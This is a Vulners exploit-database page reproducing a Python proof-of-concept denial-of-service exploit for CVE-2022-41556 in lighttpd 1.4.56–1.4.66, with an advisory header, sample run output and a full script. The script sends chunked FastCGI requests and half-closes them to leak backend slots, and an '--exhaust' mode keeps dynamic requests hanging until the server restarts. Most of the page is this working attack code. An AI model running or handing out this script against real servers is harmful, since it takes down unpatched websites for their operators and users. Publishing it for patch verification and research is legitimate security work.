Vulners
Lucene search
Lighttpd 1.4.56 - 1.4.66 Resource Leak Denial of Service PoC
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | CVE-2022-41556 | 6 Oct 202218:17 | – | attackerkb |
 | CVE-2022-41556 | 6 Oct 202200:00 | – | alpinelinux |
 | CVE-2022-41556 | 6 Oct 202222:22 | – | circl |
 | lighttpd 安全漏洞 | 28 Sep 202200:00 | – | cnnvd |
 | CVE-2022-41556 | 6 Oct 202200:00 | – | cve |
 | CVE-2022-41556 | 6 Oct 202200:00 | – | cvelist |
 | [SECURITY] [DSA 5243-1] lighttpd security update | 28 Sep 202216:05 | – | debian |
 | CVE-2022-41556 | 6 Oct 202200:00 | – | debiancve |
 | Debian DSA-5243-1 : lighttpd - security update | 29 Sep 202200:00 | – | nessus |
| Fedora 35 : lighttpd (2022-c26b19568d) | 23 Dec 202200:00 | – | nessus |
10
<html><body><p>#!/usr/bin/env python3
#
#
# Lighttpd 1.4.56 - 1.4.66 Resource Leak Denial of Service PoC
#
#
# Vendor: Glenn Strauss
# Product web page: https://www.lighttpd.net
# Affected version: 1.4.56 - 1.4.66
# Fixed version: 1.4.67-1.fc35
#
# Summary: lighttpd (pronounced /lighty/) is a secure, fast,
# compliant, and very flexible web server that has been optimized
# for high-performance environments. lighttpd uses memory and
# CPU efficiently and has lower resource use than other popular
# web servers. Its advanced feature-set (FastCGI, CGI, Auth,
# Output-Compression, URL-Rewriting and much more) make lighttpd
# the perfect web server for all systems, small and large.
#
# Desc: CVE-2022-41556 is a resource exhaustion vulnerability
# in lighttpd 1.4.56 - 1.4.66 affecting gateway backends such
# as FastCGI. When handling an HTTP/1.1 request with chunked
# transfer encoding and request-body streaming enabled, lighttpd
# mishandles an anomalous client disconnect (RDHUP / half-closed
# TCP connection) before the terminating chunk is sent. In this
# state, the gateway handler can incorrectly return HANDLER_WAIT_FOR_EVENT
# without transitioning to an error or cleanup path, leaving the
# backend connection slot permanently allocated. By repeatedly
# opening such malformed connections, an attacker can exhaust
# available backend slots, causing new dynamic requests to hang
# indefinitely and resulting in a denial of service that persists
# until the server is restarted.
#
# ---------------------------------------------------------------
# ./lightslot.py --port 88 -n 5 --delay 0.1 10.0.0.7 --fcgi-path /bus.php --exhaust
#
# o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
# | | | | | | | | | | | | | | | | | | |
# lighttpd FastCGI backend slot leak
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
#
# [+] Detected Server: lighttpd/1.4.64
# [*] Target: http://10.0.0.7:88/bus.php
# [+] [0] anomalous FastCGI request sent
# [+] [1] anomalous FastCGI request sent
# [+] [2] anomalous FastCGI request sent
# [+] [3] anomalous FastCGI request sent
# [+] [4] anomalous FastCGI request sent
# [*] Injection phase complete
# [*] Starting frontend probe
# [PROBE] frontend response time: 5.062s
# [PROBE] frontend response time: 17.047s
# [*] Cleanup complete
# [*] Test complete
# ---------------------------------------------------------------
#
# Tested on: lighttpd 1.4.64
#
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2026-5968
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5968.php
# CVE ID: CVE-2022-41556
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2022-41556
# Fix release changelog: https://www.lighttpd.net/2022/9/17/1.4.67/
# Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=2130967
#
#
# 23.01.2026
#
import threading
import argparse#
import socket###
import time#####
import sys######
banerche = """
o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | |
lighttpd FastCGI backend slot leak
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
"""
class FastCGILeakTester:
def __init__(self, host, port, fcgi_path,
conns, delay, detect_only):
self.detect_only = detect_only
self.fcgi_path = fcgi_path
self.conns = conns
self.delay = delay
self.running = True
self.sockets = []
self.host = host
self.port = port
def make_socket(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, self.port))
return s
def chunky_funk(self, cid):
try:
s = self.make_socket()
req = (
f"POST {self.fcgi_path} HTTP/1.1\r\n"
f"Host: {self.host}\r\n"
f"Transfer-Encoding: chunked\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
).encode()
s.sendall(req)
s.sendall(b"4\r\ntest\r\n")
s.shutdown(socket.SHUT_WR)
self.sockets.append(s)
print(f"[+] [{cid}] anomalous FastCGI request sent")
except Exception as e:
print(f"[-] [{cid}] failed: {e}")
def run(self):
print(f"[*] Target: http://{self.host}:{self.port}{self.fcgi_path}")
print(f"[*] Mode: {'DETECT' if self.detect_only else 'EXHAUST'}")
for i in range(self.conns):
if not self.running:
break
t = threading.Thread(
target=self.chunky_funk,
args=(i,),
daemon=True
)
t.start()
time.sleep(self.delay)
print("[*] Injection phase complete")
def frontend_probe(self):
print("[*] Starting frontend probe")
while self.running:
try:
s = self.make_socket()
start = time.time()
s.sendall(b"GET / HTTP/1.0\r\n\r\n")
s.recv(64)
elapsed = time.time() - start
s.close()
print(f"[PROBE] frontend response time: {elapsed:.3f}s")
except Exception as e:
print(f"[PROBE] frontend failure: {e}")
time.sleep(3)
def cleanup(self):
self.running = False
for s in self.sockets:
try:
s.close()
except:
pass
print("[*] Cleanup complete")
def check_lighty(host, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
resp = s.recv(512)
s.close()
for line in resp.split(b"\n"):
if b"Server:" in line and b"lighttpd" in line.lower():
print(f"[+] Detected {line.decode().strip()}")
return True
print("[-] lighttpd not detected")
return False
except Exception as e:
print(f"[-] connection failed: {e}")
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("host")
parser.add_argument("--port", type=int, default=80)
parser.add_argument("--fcgi-path", default="/index.php",
help="Must be FastCGI-backed")
parser.add_argument("-n", "--conns", type=int, default=5,
help="Use small number for detection")
parser.add_argument("--delay", type=float, default=0.2)
parser.add_argument("--exhaust", action="store_true",
help="Exhaust backend slots (DESTRUCTIVE)")
args = parser.parse_args()
print(banerche)
if not check_lighty(args.host, args.port):
sys.exit(1)
tester = FastCGILeakTester(
args.host,
args.port,
args.fcgi_path,
args.conns,
args.delay,
detect_only=not args.exhaust
)
try:
tester.run()
probe = threading.Thread(
target=tester.frontend_probe,
daemon=True
)
probe.start()
time.sleep(30)
except KeyboardInterrupt:
pass
finally:
tester.cleanup()
print("[*] Test complete")
if __name__ == "__main__":
main()
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jan 2026 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.5
EPSS0.01808